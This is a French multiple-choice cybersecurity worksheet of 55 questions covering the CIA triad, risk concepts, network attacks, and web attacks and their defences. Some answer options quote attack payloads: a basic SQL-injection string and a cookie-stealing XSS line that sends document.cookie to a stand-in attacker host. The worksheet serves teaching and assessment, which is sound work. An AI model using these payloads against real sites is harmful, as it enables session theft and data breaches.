NEW
Font size
Worksheets01. Introduction & Concepts: Fundamentals
Total questions: 55
Worksheet time: 9mins
Quel est l’objectif principal de la sécurité des systèmes d’information concernant les données ?
Autoriser accès illimité pour la collaboration
Remplacer sauvegardes par redondance matérielle
Accroître vitesse des applications critiques
Assurer confidentialité, intégrité et disponibilité
Quel exemple correspond le mieux à une menace humaine dans un SI ?
Inondation rendant un site indisponible
Ver informatique exploitant une vulnérabilité
Pic de chaleur provoquant une panne serveur
Hameçonnage ciblé d’un employé inattentif
Quel incident illustre principalement une menace technique ?
Erreur de saisie dans une base clients
Incendie détruisant la salle informatique
Employé qui divulgue des mots de passe
Propagation d’un ransomware chiffrant des postes
Une entreprise subit un incendie. Quelle mesure préventive cible prioritairement la disponibilité des services ?
Plan de reprise avec redondance géographique
Charte d’usage interdisant les clés USB
Formation anti‑phishing semestrielle
Pare‑feu bloquant ports non indispensables
Quel énoncé décrit le mieux la confidentialité dans la triade CIA ?
Les services restent rapides en toute circonstance
Seules les personnes autorisées accèdent aux données
Les données sont toujours disponibles sans interruption
Les informations sont modifiées par tous les utilisateurs
Quel est l’objectif principal de l’intégrité dans la sécurité de l’information ?
Empêcher l’altération non autorisée des informations
Optimiser la vitesse des applications critiques
Fournir l’accès aux données en permanence
Masquer toutes les données à tous les utilisateurs
La disponibilité vise principalement à :
Permettre la modification libre des enregistrements
Remplacer les sauvegardes par le chiffrement seul
Empêcher toute lecture des données sensibles
Assurer l’accès aux services quand nécessaire
Quel trio compose la triade CIA en cybersécurité ?
Chiffrement, Inspection, Authentification
Conformité, Isolation, Auditabilité
Contrôle, Inventaire, Automatisation
Confidentialité, Intégrité, Disponibilité
Un hôpital veut s’assurer que les dossiers patients ne sont ni modifiés ni supprimés sans autorisation. Quel pilier est prioritaire ?
Intégrité des données médicales
Disponibilité des salles d’opération
Confidentialité des badges visiteurs
Performance du réseau interne
Dans le cycle sécurité, quelle affirmation décrit correctement une menace par rapport à une vulnérabilité et à un risque?
Une menace est un contrôle réduisant l’exposition
Une menace est une cause potentielle d’incident
Une menace est une faiblesse interne exploitable
Une menace est la mesure de l’impact probable
Quelle définition correspond le mieux à une vulnérabilité?
Un acteur malveillant ciblant le système
Une faiblesse technique ou organisationnelle
Une probabilité d’attaque réussie estimée
Un plan de réponse aux incidents documenté
Quel énoncé décrit le risque dans ce contexte?
Évaluation de probabilité et impact d’un scénario
Inventaire détaillé des faiblesses connues
Liste des menaces externes et internes
Processus de déploiement de correctifs
Quelle action réduit le risque selon le cycle présenté?
Supprimer des vulnérabilités ou réduire exploitabilité
Reporter l’analyse jusqu’à un incident majeur
Identifier plus de menaces potentielles seulement
Augmenter la surface d’attaque volontairement
Quel acteur est principalement responsable de la stratégie de sécurité dans une organisation?
Les régulateurs écrivent les procédures
Les fournisseurs fixent toutes politiques
Les opérationnels définissent la stratégie
Le RSSI pilote la stratégie globale
À quoi sert principalement l’ISO 27001 dans une entreprise?
Gouvernance et management de la sécurité
Norme unique pour la continuité seulement
Protection juridique des brevets logiciels
Certification des pare-feu matériels seuls
Quel référentiel ou cadre correspond à une méthode d’analyse de risques?
ISO 27001 pour chiffrement asymétrique
EBIOS pour structurer l’analyse des risques
GDPR pour audits financiers annuels
COBIT pour gestion des identités locales
Quel est l’objectif principal du scanning réseau dans une phase de reconnaissance ?
Bloquer les pare-feux des segments
Chiffrer le trafic entre routeurs
Transférer fichiers vers tous les hôtes
Découvrir hôtes actifs et services exposés
Quel outil est couramment utilisé pour identifier les hôtes et les ports ouverts ?
Nmap avec sondes adaptées
Wireshark pour chiffrement
Metasploit pour routage
Tcpdump pour réplication
Quelle affirmation décrit le mieux l’énumération lors d’une attaque ?
Compresser paquets pour efficacité
Installer pilotes réseau distants
Changer adresses IP des serveurs
Récupérer bannières et versions de services
Lors d’un test de brute force lente, quel est l’objectif probable de l’attaquant ?
Essayer comptes par défaut progressivement
Saturation mémoire par paquets volumineux
Désactiver le DNS d’entreprise
Cloner tables ARP des commutateurs
Qu’est-ce qui caractérise un déni de service distribué (DDoS) ?
Un seul routeur configuré mal
Un protocole chiffré asymétrique
Une base de données fragmentée
Plusieurs machines zombies coordonnisées
Dans une attaque SYN Flood, quelle étape du TCP handshake est exploitée ?
Envoi massif de SYN non finalisés
Réinitialisation après FIN ACK
Fragmentation IP côté passerelle
Négociation TLS complète mutuelle
Quel composant est le plus directement saturé lors d’un DoS qui cible la bande passante ?
Alimentation électrique salle
Lien réseau jusqu’à la cible
Cache disque du serveur
Horloge temps réel système
Quel résultat immédiat un administrateur pourrait observer pendant un SYN Flood réussi ?
Table des connexions semi-ouvertes pleine
Taux d’erreurs CRC sur fibre élevé
Augmentation lente des fichiers journaux
Baisse temporaire du CPU client
Quel est l’objectif principal d’un empoisonnement ARP dans une attaque MITM ?
Intercepter le trafic entre deux hôtes
Accélérer la résolution des adresses MAC
Bloquer toutes les réponses ARP du réseau
Isoler le routeur du reste du LAN
Quel énoncé décrit le mieux le processus d’une attaque ARP spoofing ?
Un hôte met à jour automatiquement sa table MAC
Un serveur DNS met en cache les réponses signées
Un routeur filtre les paquets sortants en double
Un attaquant répond faussement aux requêtes ARP
Quel outil est couramment utilisé pour automatiser une attaque MITM via ARP ?
Ettercap ou Cain & Abel
Wireshark ou tcpdump
OpenSSL ou GnuPG
Snort ou Suricata
Quelle contre‑mesure réduit le risque d’usurpation IP utilisée pour des attaques par réflexion ?
Désactiver l’IPv6 sur les interfaces WAN
Utiliser des VLANs pour isoler les imprimantes
Augmenter la taille du cache ARP local
Filtrage anti‑spoofing uRPF sur les routeurs
Dans une attaque de DNS spoofing, quelle est la finalité recherchée par l’attaquant ?
Scanner les ports ouverts sur le client
Rediriger l’utilisateur vers un site pirate
Surcharger le serveur avec des SYN
Empêcher l’authentification par mots de passe
Un administrateur veut limiter le MITM basé sur ARP dans un LAN. Quelle action est la plus appropriée ?
Configurer des entrées ARP statiques critiques
Activer le routage par état sur les commutateurs
Remplacer le DNS par le DHCP seulement
Augmenter le TTL des paquets IP internes
Quel énoncé décrit le mieux une injection SQL dans une application web ?
Ajout de CSS dans une feuille de style
Compression de requêtes via index de base
Chiffrement des données via algorithme AES
Insertion de code SQL dans entrée non filtrée
Quel payload illustre une tentative d’injection SQL basique sur un champ login ?
' OR 1=1; --
DROP IMAGE users; --
SELECT login FROM cookie
Quel est l’impact le plus direct d’une injection SQL réussie sur une base ?
Chiffrement automatique des sauvegardes
Vol de données et élévation de privilèges
Augmentation du cache navigateur local
Optimisation des temps de réponse HTTP
Quelle défense réduit le risque d’injection SQL dans les requêtes ?
Utiliser des requêtes préparées systématiquement
Remplacer GET par POST universellement
Utiliser des commentaires HTML décoratifs
Activer le débogage verbose côté client
Quel effet produit la chaîne ' OR 1=1; -- sur la clause WHERE d’une requête SQL ?
Elle force un tri descendant
Elle ferme la connexion réseau
Elle rend la condition toujours vraie
Elle lance une transaction distribuée
Quel énoncé décrit correctement le Cross-Site Scripting (XSS) réfléchi ?
Compression d’images côté navigateur avancée
Transfert de paquets TCP via un proxy inverse
Injection de JavaScript exécuté dans le contexte du site
Exfiltration DNS basée sur des enregistrements TXT
Quel script malveillant vise explicitement le vol de cookies via XSS ?
console.log('cookie=' + document.cookie)
alert('cookie=' + document.cookie)
location.reload(document.cookie + '=1')
fetch('http://attacker.com?cookie=' + document.cookie)
Quelle pratique est une défense clé contre XSS lors de l’affichage de données ?
Désactiver complètement les cookies
Forcer HTTP/2 pour toutes sessions
Compresser toutes les réponses JSON
Échapper systématiquement les sorties HTML
Quel mécanisme renforce les protections frontales contre l’exécution de scripts non autorisés ?
Content Security Policy avec directives adaptées
Augmenter la taille de la pile TCP serveur
Activer le cache CDN agressif global
Utiliser DNSSEC pour toutes zones
Dans un scénario d’évaluation, quelle combinaison défensive est la plus robuste contre injection SQL et XSS ?
Balises meta, favicons, redirections 301
Compression GZIP, HTTP keep-alive, TLS
Requêtes préparées, validation des entrées, CSP
Commentaires HTML, minification JS, sprites
Quel objectif principal vise une attaque CSRF dans une application web sécurisée par cookies de session ?
Forcer une action authentifiée sans consentement
Infecter le navigateur avec un ver réseau
Voler un mot de passe via enregistreur clavier
Déchiffrer le trafic TLS entre client et serveur
Quelle mesure atténue le mieux un transfert bancaire non désiré déclenché par une balise HTML malveillante ?
Blocage complet des requêtes GET
Tokens CSRF uniques par session
Chiffrement disque complet côté client
Mots de passe plus longs périodiques
Dans un scénario CSRF, quel rôle joue le site malveillant entre la victime et la banque ?
Pare-feu filtrant les paquets entrants
Serveur d’authentification tiers sécurisé
Proxy chiffrant bout‑en‑bout les sessions
Déclencheur d’une requête légitime non voulue
Qu’est‑ce qu’un buffer overflow au niveau mémoire ?
Compression sans perte de segments mémoire
Partage concurrent de mémoire paginée
Lecture sélective d’un fichier protégé
Écriture au‑delà de l’espace alloué d’un buffer
Comment un attaquant peut‑il exploiter un débordement pour exécuter son code ?
Activer le mode lecture seule du CPU
Écraser l’adresse de retour sur la pile
Mettre à jour tous les pilotes système
Remplacer la RAM par de la mémoire ECC
Quel résultat final un débordement bien exploité vise souvent dans un programme vulnérable ?
Élévation de privilèges de l’attaquant
Baisse temporaire de la latence réseau
Amélioration du cache processeur
Augmentation de la redondance disque
Quel est l’objectif principal d’une attaque par rainbow table contre des mots de passe stockés sans sel ?
Remplacer l’algorithme de chiffrement serveur
Bloquer les comptes après plusieurs essais
Inverser rapidement des hachages pré‑calculés
Allonger automatiquement les phrases de passe
Quel avantage apporte l’ajout d’un sel unique avant le hachage d’un mot de passe ?
Empêcher la réutilisation des rainbow tables
Accélérer la vérification côté serveur
Rendre les mots de passe plus mémorables
Supprimer le besoin de limiter les tentatives
Quelle mesure renforce le mieux une politique de mot de passe robuste pour contrer les fuites de bases de données ?
Phrases de passe longues et hachage robuste
Rotation quotidienne et même mot partout
Stockage des mots de passe en base en clair
Exiger uniquement des caractères spéciaux
Dans une attaque par dictionnaire, quelle stratégie l’attaquant utilise‑t‑il le plus souvent ?
Permutation exhaustive de caractères
Listes de mots de passe courants
Injection de SQL sur le serveur
Compression des hachages en base
Quel attribut de cookie réduit le risque de vol de session via JavaScript exécuté par XSS ?
HttpOnly défini sur le cookie
Expires défini très lointain
SameSite désactivé partout
Path réglé sur la racine
Quel scénario illustre le mieux une session fixation réussie ?
Le mot de passe change après une alerte
Le navigateur rejette les cookies tiers
Le serveur invalide toutes les anciennes sessions
L’utilisateur se connecte avec un ID imposé
Après authentification, quelle action côté serveur limite l’exploitation d’un ID de session intercepté ?
Augmenter la taille du logo du site
Réduire le nombre de champs du formulaire
Activer l’auto‑complétion du navigateur
Régénérer le session ID après login
Quel est le principal risque lorsque des hachages de mots de passe sont exposés lors d’une fuite de base de données ?
Suppression automatique des doublons
Attaques offline de craquage massif
Blocage immédiat de tous les comptes
Chiffrement symétrique des sessions
Parmi ces pratiques, laquelle complète le mieux HttpOnly pour protéger les cookies de session en transit ?
Utiliser l’attribut Secure sur le cookie
Désactiver TLS sur le serveur
Autoriser le partage inter‑origines librement
Allonger indéfiniment le délai de session
